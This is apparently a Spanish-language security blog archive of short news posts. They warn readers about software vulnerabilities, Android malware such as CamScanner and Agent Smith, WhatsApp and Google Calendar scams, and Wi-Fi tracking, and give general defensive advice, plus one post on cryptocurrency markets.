  • Inyección en la interfaz del usuario (CVE-2019-16468). Afecta a las versiones 6.3, 6.4 y 6.5.
  • Inyección de expresión de lenguaje (CVE-2019-16469). Afecta a la versión 6.5. Este fallo ocurre cuando los datos controlados por el atacante se introducen en un intérprete de expresiones de lenguaje.

Numerosas versiones de Adobe Experience Manager se ven afectadas por estos fallos, y todos ellos dan lugar a la filtración de información sensible, siendo tres de las cuatro vulnerabilidades importantes en cuanto a su severidad y, la restante, moderada.

El mismo 14 de enero Adobe lanzó la versión 24.0.2 de Illustrator CC 2019 para Windows, así como parches para las versiones 6.3, 6.4 y 6.5 de Adobe Experience Manager.

Cabe señalar que el pasado mes de diciembre Adobe corrigió 25 CVEs que afectaban a múltiples productos de la compañía, entre las cuales se encontraban 17 vulnerabilidades críticas en Acrobat Reader, Phososhop y Brackets, las cuales también podían dar lugar a la ejecución de código remoto.

Desde Adobe se recomienda a los usuarios finales y administradores que instalen las actualizaciones más recientes de seguridad tan pronto como sea posible para proteger sus sistemas de potenciales ciberataques.

Más información

Adobe Releases First 2020 Patch Tuesday Software Updates

Adobe Patches Five Critical Illustrator CC Flaws

Adobe Security Bulletin: Security Updates Available for Adobe Illustrator CC | APSB20-03

Filtradas las credenciales de más de 500.000 dispositivos IoT

Categoría: IoT Seguridad

Esta semana un hacker ha publicado una lista con las credenciales de telnet de más de 515.000 servidores, routers domésticos y dispositivos IoT.

La lista fue filtrada en un foro habitual de hacking e incluye la dirección IP del dispositivo junto con el nombre de usuario y la contraseña para el servicio telnet.

Según afirma el autor de la filtración, la lista se creó buscando dispositivos que tuviesen el puerto telnet abierto. Después el hacker intento combinaciones de contraseñas por defecto o combinaciones de credenciales típicas.

Una vez creada la lista de bots, el hacker se conectó a cada dispositivo para instalar malware.

Normalmente estas listas tienen carácter privado, aunque en el pasado algunas de ellas se han filtrado, como la liberada en agosto de 2017, donde más de 33.000 credenciales de routers domésticos se hicieron públicas.

Esta lista ha sido publicada por el operador de un servicio DDoS que alquila sus servicios. La razón por la cual esta lista se hizo pública (según el hacker) es que ha migrado sus servicios a un modelo basado en servidores cloud.

Esta lista se hizo entre octubre y noviembre de 2019. Muchos de estos dispositivos podrían haber cambiado de dirección IP o estar usando credenciales diferentes.

Aunque muchas de estas credenciales ya no serían válidas, esta lista puede llegar a ser muy útil en manos de un atacante experimentado.

Más Información:

https://www.zdnet.com/article/hacker-leaks-passwords-for-more-than-500000-servers-routers-and-iot-devices/

FRAUDE: gob: Fondos disponibles | Ministerio de Trabajo y Previsión Social de Argentina

Categoría: Seguridad Whatsapp

El texto enviado por Whatsapp promete abonarle ese dinero a las personas que laburaron de 1990 a 2019.

Durante estos días se ha hecho viral un mensaje de Whatsapp que ofrece $120 mil a trabajadores argentinos que hayan cumplido funciones desde 1990 a 2019.

Aunque parezca muy tentador, este mensaje es falso y la única intención es robarle información a las personas que hacen click en el link apócrifo que sale al final del texto.

El mensaje se ha replicado en varios puntos de Latinoamérica desde hace meses y por ello utiliza un genérico como el Ministerio de Trabajo y Prevision Social de Argentina como organismo que entrega el dinero a los trabajadores, como otros organismos en otros lugares de Latinoamérica.

El mensaje dice lo siguiente:

«gob: Fondos disponibles. Obtenga $120.000

Aquellos que trabajaron entre 1990 y 2019 tienen el derecho de retirar de gob de Argentina. Verifique si su nombre figura en la lista de aquellos que tienen derecho a retirar estos fundos: (notese el error gramatical)

La página a la que no hay que hacer click es: http://maxhog.com/Argentina 

Luego sale un link que solicita datos personales y hasta el número de teléfono.

La idea es tomar datos para realizar publicidad o hasta cometer delitos. Por ello, es importante que si hacés click en la web  no dar información de ningún tipo.

Otra prueba de la falsedad es que la página no cuenta con protocolos de seguridad HTTPS, esta vulnera la privacidad del servicio de los usuarios, además de hacer difícil salir de la página, obligando a compartirla.

Bug en app de cámara de Android permite a otras apps usar la cámara sin permisos

Categoría: Android Seguridad

Ha sido descubierta una nueva vulnerabilidad en las aplicaciones de cámara de Google y Samsung que permite realizar fotos y grabar vídeo a otras aplicaciones sin que éstas soliciten los permisos necesarios para ello.

Investigadores de la empresa ‘Checkmarx’ han hecho publica una vulnerabilidad descubierta en verano de este año. El fallo afecta a las aplicaciones de cámara de Google y Samsung. Dicha vulnerabilidad ha sido identificada como CVE-2019-2234.

La aplicación de cámara de Google se encuentra instalada por defecto en los dispositivos Pixel de Google, mientras que la aplicación de cámara de Samsung se encuentra instalada en los dispositivos Samsung.

Por seguridad, una aplicación para Android debe solicitar permiso para acceder a la cámara, y por tanto, para tomar fotos y grabar vídeos. Los permisos que debe solicitar son: android.permission.CAMERA y android.permission.RECORD_AUDIO

Además, para el acceso a datos sobre la localización espacial del dispositivo es necesario que la aplicación solicite permisos para ello: android.permission.ACCESS_FINE_LOCATION y android.permission.ACCESS_COARSE_LOCATION

Aprovechando la vulnerabilidad descubierta, una aplicación maliciosa podría tomar fotos y grabar vídeos sin necesidad de solicitar dichos permisos. Además, como las fotografías incluyen metadatos del GPS del dispositivo, la aplicación podría también obtener información sobre la localización del dispositivo sin necesidad de solicitar los permisos para ello.

Como podemos observar en el vídeo publicado por Checkmarx, una aplicación maliciosa que aproveche esta vulnerabilidad puede obtener información confidencial y enviarla al atacante.

La vulnerabilidad reside en los ‘Intents’ que expone las aplicaciones de cámara afectadas. Dichos ‘Intents’ pueden ser ejecutados por otras aplicaciones sin necesidad de permisos especiales.

A través de los ‘intents’, la aplicación maliciosa puede ejecutar la app de cámara y forzarla a grabar vídeos o tomar fotos mientras el dispositivo está bloqueado o incluso mientras el usuario se encuentra en mitad de una llamada, permitiendo grabar el audio de la llamada.

Google corrigió el problema en Julio de 2019, poco después de que se les reportase. Se recomienda a todos los usuarios de la app que actualicen a la última versión para asegurarse de que no les afecta este problema.

Más información:

Post Checkmarx
https://www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera

Fuente: Una al día

Seguimiento de puntos de acceso Wi-Fi

Categoría: Información Seguridad

Los puntos de acceso Wi-Fi gratuitos pueden rastrear su ubicación, incluso si no se conecta a ellos. Esto se debe a que su teléfono o computadora emite una dirección MAC única.

Lo que distingue a los proveedores de puntos de acceso de los distintos mercados o shoppings basados ​​en la ubicación como Zenreach y Euclid es que la información personal que ingresa en el portal cautivo, como su dirección de correo electrónico, número de teléfono o perfil de redes sociales, puede vincularse al Control de acceso a medios de su computadora portátil o teléfono inteligente (Dirección MAC), esa es la identificación alfanumérica única que los dispositivos transmiten cuando se enciende el Wi-Fi.

Como explica Euclid en su política de privacidad, «… si hoy lleva su dispositivo móvil a su tienda de ropa favorita que es una Ubicación – y luego un restaurante local popular unos días más tarde que también es una Ubicación – podemos saber que un dispositivo móvil estaba en ambas ubicaciones basándose en ver la misma dirección MAC «.

Las direcciones MAC por sí solas no contienen información de identificación además de la marca de un dispositivo, como si un teléfono inteligente iPhone o un Samsung Galaxy. Pero siempre que la dirección MAC de un dispositivo esté vinculada al perfil de alguien y la conexión Wi-Fi del dispositivo esté activada, los movimientos de su propietario pueden ser seguidos por cualquier punto de acceso del mismo proveedor.

«Después de que un usuario se registra, asociamos su dirección de correo electrónico y otra información personal con la dirección MAC de su dispositivo y con cualquier historial de ubicación que hayamos reunido previamente (o más tarde) para la dirección MAC de ese dispositivo», de acuerdo con la política de privacidad de Zenreach.

La defensa es apagar el Wi-Fi en su teléfono cuando no lo esté usando.

ADVERTENCIA: Malware encontrado en la aplicación de Android, CamScanner, con más de 100 millones de usuarios

Categoría: Android Malware

¡A tener cuidado! Los atacantes pueden secuestrar de forma remota su dispositivo Android y robar datos almacenados en él, si está utilizando CamScanner, una aplicación de creación de PDF de celulares muy popular con más de 100 millones de descargas en Google Play Store.

Entonces, para estar seguro, simplemente desinstale la aplicación CamScanner de su dispositivo Android ahora, ya que Google ya ha eliminado la aplicación de su Play Store oficial.

Desafortunadamente, CamScanner se ha vuelto deshonesto recientemente cuando los investigadores encontraron un módulo troyano oculto dentro de la aplicación que podría permitir a los atacantes remotos descargar e instalar secretamente programas maliciosos en los dispositivos Android de los usuarios sin su conocimiento.

Sin embargo, el módulo malicioso en realidad no reside en el código de la aplicación CamScanner para Android; en cambio, es parte de una biblioteca de publicidad de terceros que se introdujo recientemente en la aplicación de creación de PDF.

Descubierto por los investigadores de seguridad de Kaspersky, el problema salió a la luz después de que muchos usuarios de CamScanner detectaron un comportamiento sospechoso y publicaron críticas negativas en Google Play Store en los últimos meses, lo que indica la presencia de una función no deseada.

«Se puede suponer que la razón por la que se agregó este malware fue la asociación de los desarrolladores de la aplicación con un anunciante sin escrúpulos», dijeron los investigadores.

El análisis del módulo troyano Dropper malicioso reveló que el mismo componente también se observó anteriormente en algunas aplicaciones preinstaladas en teléfonos inteligentes chinos.

«El módulo extrae y ejecuta otro módulo malicioso de un archivo cifrado incluido en los recursos de la aplicación», advirtieron los investigadores.

«Como resultado, los propietarios del módulo pueden usar un dispositivo infectado para su beneficio de la manera que mejor les parezca, desde mostrar a la víctima publicidad intrusiva hasta robar dinero de su cuenta móvil mediante el cobro de suscripciones pagas».

Los investigadores de Kaspersky informaron sus hallazgos a Google, quien rápidamente eliminó la aplicación CamScanner de su Play Store, pero dicen que «parece que los desarrolladores de aplicaciones eliminaron el código malicioso con la última actualización de CamScanner».

A pesar de esto, los investigadores aconsejaron a los usuarios que solo tengan en cuenta «que las versiones de la aplicación varían para diferentes dispositivos, y algunas de ellas aún pueden contener código malicioso».

Aunque Google ha intensificado sus esfuerzos para eliminar aplicaciones potencialmente dañinas de Play Store en los últimos años y ha agregado controles de malware más estrictos para nuevas aplicaciones, las aplicaciones legítimas pueden volverse deshonestas durante la noche para apuntar a millones de sus usuarios.

«Lo que podemos aprender de esta historia es que cualquier aplicación, incluso una de una tienda oficial, incluso una con buena reputación e incluso una con millones de críticas positivas y una gran base de usuarios leales, puede convertirse en malware de la noche a la mañana».

Los investigadores concluyeron. Por lo tanto, se recomienda encarecidamente mantener siempre una buena aplicación antivirus en su dispositivo Android que pueda detectar y bloquear tales actividades maliciosas antes de que puedan infectar su dispositivo.

Además, siempre mire las revisiones de la aplicación dejadas por otros usuarios que la hayan descargado, y también verifique los permisos de la aplicación antes de instalar cualquier aplicación y otorgue solo los permisos que sean relevantes para el propósito de la aplicación.

Para obtener más detalles técnicos sobre el malware Trojan Dropper que se encuentra en CamScanner y una lista completa de sus indicadores de compromiso (IOC), incluidos los hash MD5 y sus dominios de servidor de comando y control, puede dirigirse al informe de Kaspersky.

¿Tienes algo que decir sobre este artículo? Comenta a continuación o compártelo en Facebook, o Twitter.

Estafas mediante Google Calendar (Retira tu Iphone)

Categoría: Calendario Iphone Seguridad

«Tu iPhone X está listo para que lo retires». Este mensaje apareció junto con un link en mi Calendario de Google (o Google Calendar). No abrí el mensaje, y no presioné en el enlace. A todas luces era un intento de phishing.

En este caso era demasiado obvio por varios motivos: además de que el mensaje aparecía en inglés, yo no había encargado ningún celular en ningún sitio, ni participado de ningún sorteo para obtener una recompensa de ese tipo. Además, el mensaje aparecía replicado en una misma franja horaria durante toda la semana.

Por otra parte, hace años que se viene advirtiendo sobre los engaños de phishing, tal como se denominan a las diferentes técnicas de ingeniería social que se utilizan para obtener datos personales de usuarios, contraseñas o detalles de tarjetas de crédito. A esta altura, como probablemente les ocurra a muchos de ustedes, estoy acostumbrada a dudar siempre. Además, son gajes de este oficio. Pero aún así nadie está exento de caer en engaños, sobre todo porque a veces son un poco más elaborados que en este caso y, a su vez, porque la distracción puede jugarnos una mala pasada.

Estas técnicas de ingeniería social son, básicamente, anzuelos que utilizan los cibercriminales para convencer al usuario para que, de algún modo (muchas veces sin saberlo) les dé su información privada. Usualmente lo hacen enviando un correo o mensaje con un enlace que, al ser presionado puede, por ejemplo, derivarlo a una página fraudulenta que emula ser un sitio legítimo. Allí se le pide al usuario que ingrese los datos de su tarjeta, o nombre de usuario y contraseña. Esa información es captada por el cibercriminal y luego es empleada para hackear a su víctima de diferentes formas. En otros casos se recurre a archivos adjuntos que encierran algún programa malicioso.

La invitación a retirar un iPhone X que llegó directamente a mi calendario.

En este caso no se utilizó un servicio de mensajería ni correo, sino que la invitación a hacer clic en el enlace para obtener el supuesto iPhone, llegó directamente al calendario de Google. Y esto puede tomar por desprevenido a más de un usuario que, quizás sin sospechar de que un enlace maliciosos pueda llegar por esa vía, presiona sobre él y puede caer en la trampa.

«Los atacantes han vuelto a un viejo vector de ataque, y es muy interesante porque el hecho de apalancarse en las notificaciones de Google hace que todo pareciera mucho más auténtico.. El recurso del calendario ya tiene unos 4 años», explicó Federico Teti, ingeniero de la empresa de ciberseguridad Forcepoint.

Cabe destacar que el engaño puede resultar un poco más sofisticado y, por ejemplo, se podría enviar al Calendario de Google un enlace que se le pide al usuario que presione para actualizar una información o para aceptar la invitación a algún evento que pueda resultarle familiar.

«Los phishers envían enlaces a encuestas falsas con descripciones de eventos breves como ‘Recibió una recompensa en efectivo o Hay una transferencia de dinero a su nombre´. La idea, por supuesto, es hacer que las víctimas hagan clic y luego ingresen información personal en la forma maliciosa. A veces, los formularios engañan a los objetivos para que ingresen la información de la tarjeta de crédito al pedirles que envíen una pequeña cantidad de dinero para ganar una suma mucho mayor», añadió Teti.

¿Por qué llegan estas invitaciones al Calendario y cómo evitarlo? Porque el Calendario de Google, por default, está configurado para ver las invitaciones que se reciben a eventos, aún cuando uno no las haya aceptado. Esto permite, por ejemplo, que alguien pueda enviarnos una invitación por mail y que la visualicemos directamente en el Calendario, pero esto se soluciona con cambiar los ajustes.

Ingresar en el ícono del Calendario que aparece al presionar el símbolo punteado que está en el margen superior derecho, junto a la foto de perfil, en el Gmail.

Ingresar a Gmail desde la desktop, presionar en el menú punteado que figura en el extremo superior derecho e ingresar al ícono de Calendario o Calendar.

Ingresar en el menú de configuración y elegir “Configuración de los eventos”

Luego presionar la tuerca, ícono de configuración y una vez allí seleccionar la opción que dice Configuración de eventos y donde dice «Añadir invitaciones de forma automática» seleccionar la opción que dice: «No, mostrar solamente las invitaciones a las que he respondido».

Elegir la opción que dice: “No, mostrar solamente las invitaciones a las que he respondido”.

Luego dentro de Opciones de visualización destildar la opción que dice «Mostrar eventos rechazados» para dejar de ver el mensaje en el calendario, caso contrario se seguirá viendo, aún luego de haber rechazado la invitación.

Dentro de Opciones de visualización destildar la opción que dice “Mostrar eventos rechazados”.

Ramsonware, una amenaza que sigue creciendo

Categoría: Información Ransomware Seguridad

Durante los últimos años hemos estado hablando muchisimo de ataques de Ramsonware, siendo el año 2019 el de mayor porcentaje de ataques a distintas entidades, tanto gubernamentales como particulares.

Pero la comunidad entera hace un gran esfuerzo por tratar de evitar que esto siga sucediendo, dando charlas públicas, educando mediante papers informátivos, etc. Nosotros no debemos de dejar de aprender todo lo relativo a tecnología ya que actualmente es algo que vive entre nosotros y va a seguir incrementando su participación en la vida diaria.

Existe un sitio web ( https://www.nomoreransom.org/ ) en donde están la mayoría de los desencriptadores de archivos que se han podido descrifrar hasta el momento y la lista crece día a día. También está en varios idiomas por lo que se deduce y es realidad que este problema nos afecta a nivel mundial.

Mientras tanto usted puede seguir educandose en lo relativo a ciberseguridad para que los distintos ramsonware que se crean y siguen atacandonos no los sorpenda.

Te ha pasado alguna vez que te ha llegado un email de procedencia dudosa con un link? Eso es un posible ataque de phishing que puede llegar a ser el puntapie inicial para un ataque de ramsonware.

Si tienes alguna duda no dejes de consultarme o si quieres comentar algo debajo también, así los lectores que leen el blog están atentos a los distintos tipos de ataque que se presentan en nuestro día a día.

Google encontró una manera de atacar de forma remota los dispositivos Apple iOS enviando un iMessage bobbytrapped (atrapado)

Categoría: iOS Seguridad

Espero que los propietarios de iPhones e iPads hayan actualizado sus dispositivos a iOS 12.4 cuando se lanzó la semana pasada.

Los detalles no se compartieron en ese momento, pero ahora sabemos que la actualización de seguridad de iOS abordó vulnerabilidades críticas descubiertas por los investigadores de seguridad de Google Samuel Groß y Natalie Silvanovich que podrían permitir que un atacante remoto ataque un iPhone simplemente enviando un iMessage creado con fines maliciosos.

Afortunadamente, las vulnerabilidades, que probablemente podrían haber sido vendidas a una agencia de inteligencia por millones de dólares, se divulgaron de manera responsable a Apple en mayo para que pudieran abordarse y repararse dentro del plazo de divulgación de 90 días impuesto por Google.

Se dice que las vulnerabilidades permiten que un atacante remoto ejecute código malicioso en un dispositivo iOS sin requerir ninguna acción por parte del usuario objetivo, lo que abre oportunidades para que los iPhones e iPads sean espiados sin el conocimiento de sus propietarios y sin que el atacante requiera ningún acceso físico al dispositivo.

La ingeniera de seguridad de Google, Natalie Silvanovich, tiene previsto dar una charla en Black Hat en Las Vegas la próxima semana, titulada “Look, No Hands! – The Remote, Interaction-less Attack Surface of the iPhone”

Los usuarios de iPhone e iPad a menudo tienen sus dispositivos configurados para instalar automáticamente actualizaciones como iOS 12.4, pero, si desea asegurarse de estar protegido, siga estas instrucciones:

Haga click en Settings > General > Software Update, y elige Download and Install.

Circula versión falsa de WhatsApp que ofrece ‘Internet gratis’

Categoría: Redes Sociales Seguridad Whatsapp

Según los investigadores de ESET, una nueva estafa se hace pasar por WhatsApp y utiliza la afirmación fraudulenta de que sus víctimas recibirán «internet gratis». Los investigadores en América Latina recibieron un mensaje en WhatsApp indicando que la aplicación estaba regalando 1,000 GB de datos de Internet para celebrar su aniversario.

No debería sorprendernos tanto cuando decimos que fue una estafa, dijo el informe y luego analizó la situación con mayor detalle. La URL parecía sospechosa para los investigadores, quienes notaron que no era un dominio oficial de WhatsApp.

Aunque las empresas a veces pueden realizar promociones a través de terceros, la regla general aquí es verificar en el sitio web de la empresa para asegurarse de que cualquier promoción sea real y válida, agregaron los investigadores.

De hecho, hacer clic en el enlace lleva al usuario a una página de encuesta con el logotipo de WhatsApp en la parte superior. No es sorprendente que los que caen en la estafa y comiencen a responder preguntas sean invitados a compartir el enlace con 30 amigos para poder participar en el sorteo y ganar.

Creditos: Eset

Aparentemente, su objetivo aquí es el fraude de clics, un esquema de monetización muy frecuente que se basa en acumular clics de anuncios falsos que finalmente generan ingresos para los operadores de cualquier campaña, dijo el informe.

Debido a que puede reutilizarse para realizar una variedad de otras funciones, el fraude de clics presenta muchas amenazas diferentes. «Aunque en este caso no encontramos evidencia de que hacer clic en el enlace condujera a la instalación de software malicioso o de que hubiera alguna intención de suplantar información personal, no significa que esto no pueda cambiar en ningún momento».

Los investigadores agregaron que el dominio utilizado en esta estafa también alberga otras ofertas fraudulentas de compañías de alto perfil, incluidas Adidas, Nestlé y Rolex.

Si a usted le llega algún vínculo para hace click ofreciendoles diferentes productos o servicios gratis comentennos. Juntos podemos ayudar a concientizar por este tipo de estafa y engaños.

FaceApp, cuando una moda se torna peligrosa

Categoría: Android Facebook Redes Sociales Seguridad Whatsapp

Hemos estado analizando en detalle varias aplicaciones de belleza facial, filtros de imágenes, editores de vídeos y demás. En cuanto a la cantidad de aplicaciones que hay en playStore es interminable, ya que cientos de ellas se cargan diariamente y nos resulta imposible analizarlas una a una. Por este motivo cientos desarrolladores de Google analizan el código fuente de cada aplicación para confirmar si se trata de una aplicación confiable y segura. Pero a veces ciertos errores por parte de estos últimos pueden pasar por alto algunas aplicaciones maliciosas.

También puede pasar de que al principio una simple aplicación sea confiable y con el paso del tiempo se torne maliciosa, sea por intromisión de terceros en el desarrollo del código o por ventas de estas mismas a compañías de dudosa reputación.

Después de esta introducción el principal problema no es alarmar a nadie y que desinstale todas las aplicaciones que posee en su celular, pero lo que sí debe saber es que al darle diferentes permisos a estas mismas, no leer los acuerdos de privacidad y demás estamos dejando en manos de terceros nuestra privacidad y detalle de nuestro día a día. 

Esta aplicación puede acceder a:

Fotos/multimedia/archivos
 - modificar o borrar contenido de su almacenamiento USB
 - leer el contenido de su almacenamiento USB
Cámara
 - tomar imágenes y vídeos
Almacenamiento
 - modificar o borrar contenido de su almacenamiento USB
 - leer el contenido de su almacenamiento USB
Otro motivo
 - recibir datos desde Internet
 - full acceso a su red
 - evitar que el dispositivo se duerma
 - leer configuraciones de servicio de Google
 - ver conexiones de red 
Al instalar actualizaciones de FaceApp, es posible que se añadan automáticamente funciones adicionales en cada grupo. 

Esos permisos fueron tomados desde la App de FaceApp, en particular el último renglón es el que mas ruido nos hace al poder modificar permisos automáticamente en cada grupo. Partiendo de la base de que el grupo desarrollador de esta aplicación tiene ciertos antecedentes de brindar información a terceros es cuando mas duda nos genera.

Pero recordemos también que Facebook estuvo bajo investigación en el escándalo Cambridge Analytica. Entonces nos podemos preguntar si todo lo que nosotros tenemos en nuestros celulares personales (también tablets, y pcs) es seguro y confidencial. Lamentablemente la respuesta a esta pregunta es que no. Y es por eso que la seguridad informática se vuelve crucial a la hora de vivir en una época tecnológica.

Mi mayor recomendación es que lean los permisos que le pide cada aplicación, investiguemos antes de instalar cierta app, no descarguemos desde cualquier lugar las aplicaciones sino solo de las tiendas oficiales y estemos actualizados constantemente en lo que se refiere a tecnología.

Si usted necesita una opinión o consejo, no dude en consultarme. Si le gustó el artículo compartalo en sus redes sociales o con sus contactos.

Malware para android «Agente Smith» infectó 25 millones de dispositivos

Categoría: Android Malware Seguridad

Los investigadores de Check Point descubrieron recientemente una nueva variante de malware para Android, llamada Agent Smith, que ya ha infectado a aproximadamente 25 millones de dispositivos. El malware está disfrazado de una aplicación relacionada con Google y explota varias vulnerabilidades conocidas de Android para reemplazar las aplicaciones instaladas en el dispositivo de la víctima sin la interacción del usuario.

«Los investigadores de Check Point descubrieron recientemente una nueva variante de malware para dispositivos móviles que ha infectado silenciosamente a unos 25 millones de dispositivos, mientras que el usuario permanece completamente inconsciente», dice el análisis publicado por los expertos. «Disfrazada como una aplicación relacionada con Google, la parte central del malware explota varias vulnerabilidades conocidas de Android y reemplaza automáticamente las aplicaciones instaladas en el dispositivo con versiones maliciosas sin la interacción del usuario».

La mayoría de las víctimas se encuentran en India, Pakistán y Bangladesh, seguidas de Reino Unido, Australia y los Estados Unidos.

El malware Agente Smith se disfraza de aplicaciones de utilidad (es decir, edición de fotos), entretenimiento para adultos o juegos, y se propaga a través de tiendas de aplicaciones de terceros. El malware de Android aprovecha varias vulnerabilidades conocidas de Android, incluida la falla de Janus y la falla de Man-in-the-Disk para inyectar el código malicioso en los archivos APK de aplicaciones legítimas que están instaladas en un dispositivo comprometido. Luego, el código malintencionado los vuelve a instalar / actualiza automáticamente sin la interacción del usuario.

Los expertos creen que el malware fue desarrollado por una empresa con sede en China para monetizar sus esfuerzos sirviendo a publicidades maliciosas.

Los expertos describieron una cadena de ataques compuesta de tres etapas. En la primera etapa, los atacantes engañan a las víctimas para que descarguen una aplicación dropper de tiendas de aplicaciones de terceros, como 9Apps. La aplicación dropper verifica si alguna aplicación popular está instalada en el dispositivo y luego la apunta con el malware Agente Smith.

Una vez que el dropper se haya posicionado en el dispositivo de la víctima, descifrará automáticamente la carga maliciosa en un archivo APK que representa la parte central del ataque del «Agente Smith». El dropper explota varias vulnerabilidades conocidas para instalar malware central sin la interacción del usuario.

En la tercera etapa, el malware principal se dirige a las aplicaciones instaladas en el dispositivo que se incluyen en su lista de destino.

«El malware central extrae silenciosamente el archivo APK de una aplicación inocente dada, lo repara con módulos maliciosos adicionales y finalmente abusa de un conjunto adicional de vulnerabilidades del sistema para intercambiar silenciosamente la versión inocente por una maliciosa», continúa el informe.

«Al invertir una gran cantidad de recursos en el desarrollo de este malware, el actor detrás de Agente Smith no quiere una actualización real para eliminar todos los cambios realizados, por lo que aquí es donde entra en juego el módulo Patch»

«Con el único propósito de deshabilitar las actualizaciones automáticas para la aplicación infectada, este módulo observa el directorio de actualización de la aplicación original y elimina el archivo una vez que aparece».

Los investigadores explicaron que la estructura modular del malware facilita su uso para otros fines malintencionados, como el robo de información confidencial.

CheckPoint también encontró al menos 11 aplicaciones infectadas en Google Play Store que contienen un SDK malicioso pero inactivo asociado con los atacantes del «Agente Smith», un problema que sugiere que los actores de amenazas intentan infectar a los usuarios de Android a través de la tienda oficial. Según los informes, Google ha eliminado de Play Store todas las aplicaciones contaminadas.

Los expertos sugieren que los usuarios descarguen aplicaciones solo de las tiendas de aplicaciones de confianza y mantengan sus dispositivos actualizados porque el Agente Smith explota las fallas conocidas que se remontan a 2017.

Se recomienda a los desarrolladores que implementen el último APK Signature Scheme V2 para evitar el abuso de Janus.

Sin preparación para defensa contra delitos informáticos

Categoría: Información Seguridad

Dados los últimos ataques por parte de cibercriminales nos preguntamos si estamos a la altura de esos mismos como sociedad. La respuesta que surge a priori es que «no» y qué tampoco tomamos conciencia a la hora de contratar defensas para nuestro resguardo.

Ya no solo basta con tener un antivirus y un firewall en nuestros principales sistemas, sino una acción conjunta de los principales organismos en alertarnos por todos los problemas que surgen y que por algún motivo nos ocultan.

Recordemos el corte de luz en forma masiva en casi toda la Argentina y parte de los países limítrofes. Puede haber sido un ciberataque y nos están ocultando algo? Puede, pero de que nos serviría a nosotros como sociedad el saber eso? Si tampoco contamos en nuestros hogares con la suficiente seguridad y menos aún tomamos real conciencia de todo lo que eso conllevaría.

Instalamos programas sin leer los acuerdos de privacidad, eso nos hace vulnerables a la hora de tener nuestra información, fotos y demás a resguardo ya que la gran mayoria de las grandes compañías comparten toda esa información para publicidad y está expresamente detallado en los acuerdos de privacidad que nosotros aceptamos sin leer.

La pregunta sería que solución podemos darle a todo este asunto? Y la respuesta es conciencia y no divulgación de todos nuestros aspectos de la vida privada. Necesitamos que más personas se involucren en lo que respecta a seguridad informática y se capaciten constantemente para darnos una respuesta a este asunto.

Y no solo en las grandes ciudades pasa todo, ya que vemos cada vez más dispositivos que nos ayudan en nuestra vida cotidiana y estan al alcance de nuestras manos. Es por eso que les aconsejo que antes de adquirir un dispositivo informático, dispositivo de ayuda hogareña con conexión a internet o instalar un programa de terceros lean algunas opiniones y verifiquen que los niveles de seguridad son altos y que no posean vulnerabilidades críticas.

Si tenés alguna duda escribime debajo y con gusto te responderé

Páginas alojadas localmente permiten el robo de ficheros en Firefox desde hace 17 años

Categoría: Seguridad

La vulnerabilidad sólo requiere abrir un fichero .html malicioso con el navegador para tener acceso a los archivos del directorio.

Según ha demostrado Barak Tawily, un analista de seguridad que ya reportó una vulnerabilidad similar, la implementación de Same Origin Policy (SOP) de Firefox para el esquema «file://» permite listar y acceder a ficheros del mismo directorio y subdirectorios. Un atacante podría mediante un fichero .html descargado de Internet y abierto con Firefox acceder a todos los archivos donde se descargó el documento.

La vulnerabilidad, que todavía no ha sido parcheada y no se espera que se solucione de momento, se debería a que el RFC de ‘SOP’ para el esquema «file://» no deja claro cual debe ser el comportamiento en estos casos, por lo que cada navegador acaba haciendo su propia implementación del estándar.

En la prueba de concepto (PoC) realizada por Tawily y grabada en vídeo puede comprobarse cómo abriendo un fichero ‘.html’ descargado y abierto desde las descargas de Firefox sin que se muestre ningún aviso es posible acceder a ficheros sensibles del directorio sin que el usuario se dé cuenta.

El fallo en realidad no es nuevo, pues ya fue reportado en Netscape 6 y Mozilla en el 2002, reportándose en nuevas ocasiones con el mismo efecto.

De momento la única solución es no abrir ficheros ‘.htm’ o ‘.html’ de local utilizando Firefox. Una posible alternativa, y sólo si es estrictamente necesario, sería copiar el archivo a una carpeta vacía, y abrirlo desde dicha carpeta.

Más información:

Firefox Local Files Theft – not patched yet:
https://quitten.github.io/Firefox/

Wall Street tenderá a criptomonedas

Categoría: Criptomonedas

La pronunciada suba que registró el precio de las monedas digitales renueve el interés entre los inversores institucionales. Hay firmas del sector de servicios financieros que las agregarán a sus carteras.

Después de que el bitcoin silbó y explotó a principios del año pasado, Wall Street pareció perder el interés. Goldman Sachs mantuvo el silencio sobre sus planes de abrir una mesa de operaciones con activos digitales después de que el precio de la criptomoneda perdió 80% de su valor. En octubre del año pasado, el CEO de JPMorgan Chase Jamie Dimon redobló su escepticismo inicial cuando en una conferencia aseguró que «no le importaba nada» el bitcoin.

Pero ahora que los precios del bitcoin y de otras criptomonedas volvieron a la cima, algunas grandes figuras de la industria de servicios financieros se preguntan si lo anormal fue el pico o el derrumbe de los últimos meses. La compañía financiera holandesa Flow Traders anunció en abril que agregaba criptomonedas a su cartera de productos.

El mes pasado, un grupo de 50 compañías incluyendo Jump Trading y DRW —dos firmas de corretaje de alta frecuencia— y el banco comercial de criptomonedas Galaxy Digital de Mike Novogratz formó un grupo para desarrollar un mercado «profundo, eficiente y seguro».

«En los últimos dos años se obtuvieron evidencias de que el bitcoin es una clase de activo no correlacionado, por lo que tiene sentido agregarlo a nuestra cartera», dijo Marcus Swanepoel, ex ejecutivo de Morgan Stanley que hoy en Standard Chartered dirige Luno, una criptocompañía.

La trayectoria del bitcoin definitivamente ha sido sin dudas llamativa. Su precio más que se duplicó en dos meses, terminó la semana cerca de u$s 11.800. Todavía no llegó a los picos de fines de 2017, pero los entusiastas sostienen que el repunte continuará.

Entre las principales argumentos que ofrecen los optimistas se encuentran el reciente anuncio de Facebook respecto al lanzamiento de una nueva moneda digital en 2020 y el fuerte giro de la política monetaria en la Reserva Federal estadounidense. Junto con los ruidos expansivos del Banco Central Europeo y del Banco de Japón, eso ayudó a colocar el valor total de la deuda con rendimiento negativo cerca de u$s 12,7 billones, según datos de Bloomberg y Barclays. En ese contexto, el oro menos rendidor se ve atractivo, al igual que el bitcoin.

«Hay mucha demanda proveniente de Asia y Japón donde el bitcoin representa una ola de esperanza frente a un entorno monetario deflacionario», dijo David Mercer, CEO de LMAX Exchange, una plataforma de negociación de monedas con operaciones diarias en criptomonedas por u$s 400 millones y que empezó a ofrecerlas el año pasado. «Se convirtió en un refugio del espacio digital».

Si bien la demanda de criptomonedas proviene de los inversores minoristas, en particular de Asia, los institucionales cada vez se involucran más debido a los generosos spreads y a los crecientes volúmenes. Según Mercer, seis de los mayores operadores de alta frecuencia que emplean la plataforma cambiaria de LMAX se mantienen activos en el criptomercado.

